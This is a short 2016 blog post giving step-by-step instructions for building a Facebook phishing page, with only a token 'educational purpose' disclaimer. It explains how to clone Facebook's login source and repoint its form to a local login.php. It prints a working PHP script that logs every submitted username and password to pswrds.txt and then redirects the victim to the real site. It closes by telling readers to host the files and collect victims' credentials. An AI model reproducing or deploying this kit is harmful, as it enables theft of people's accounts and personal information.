Tuesday 12 January 2016

face-book hacking (phishing).




This is only for educational purpose...
what does phishing means?
       "the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers, online"
hacking facebook account:
step1: enter in to facebook login page.
step2: right click any where on the page , from the popup menu choose view source code.
step3: open a new notepad , copy the source code in to notepad 
step4: press ctrl+f , and enter "action" in the text box.
step5: press enter twice.
step6:you will find action= "http://www.facebook.com/login.php?login_attempt=1". replace this with action="login.php" 
 step7: save the notepad file as "index.html".
step8: type the following code in  ur new note pad.

    <?php
    header("Location: http://www.Facebook.com/login.php ");
    $handle = fopen("pswrds.txt", "a");
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
save it as "login.php"
step9:again open  a new note pad (empty) . save it as "pswrds.txt" now u have 3 file as shown in red color.
step10:  host all the 3 files  in to ur hosting account.
step11: who so ever logsin via ur link will b hacked, you will recieve his/her account name & password in 'pswrds.txt'
recommended links: learn hacking -social network

No comments: